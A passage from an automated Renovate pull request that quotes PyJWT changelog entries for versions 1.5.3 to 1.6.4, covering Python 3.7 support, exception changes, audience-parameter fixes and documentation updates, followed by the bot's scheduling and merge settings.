deprecation warnings ``` ### [`v1.6.4`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v170-httpsgithubcomjpadillapyjwtcompare164170) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.6.3...1.6.4) Changed ``` - Remove CRLF line endings `#​353 `__ Fixed ~~~~~ - Update usage.rst `#​360 `__ Added ~~~~~ - Support for Python 3.7 `#​375 `__ `#​379 `__ `#​384 `__ ``` ### [`v1.6.3`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v164-httpsgithubcomjpadillapyjwtcompare163164) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.6.1...1.6.3) Fixed ``` - Reverse an unintentional breaking API change to .decode() `#​352 `__ ``` ### [`v1.6.1`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v163-httpsgithubcomjpadillapyjwtcompare161163) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.6.0...1.6.1) Changed ``` - All exceptions inherit from PyJWTError `#​340 `__ Added ~~~~~ - Add type hints `#​344 `__ - Add help module `7ca41e `__ Docs ~~~~ - Added section to usage docs for jwt.get\_unverified\_header() `#​350 `__ - Update legacy instructions for using pycrypto `#​337 `__ ``` ### [`v1.6.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v161-httpsgithubcomjpadillapyjwtcompare160161) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.5.3...1.6.0) Fixed ``` - Audience parameter throws ``InvalidAudienceError`` when application does not specify an audience, but the token does. `#​336 `__ ``` ### [`v1.5.3`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v160-httpsgithubcomjpadillapyjwtcompare153160) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.5.2...1.5.3) Changed ``` - Dropped support for python 2.6 and 3.3 `#​301 `__ - An invalid signature now raises an ``InvalidSignatureError`` instead of ``DecodeError`` `#​316 `__ Fixed ~~~~~ - Fix over-eager fallback to stdin `#​304 `__ Added ~~~~~ - Audience parameter now supports iterables `#​306 `__ ```

Configuration

📅 Schedule: Branch creation - "" in timezone US/Eastern, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Mend Renovate. View repository job log here.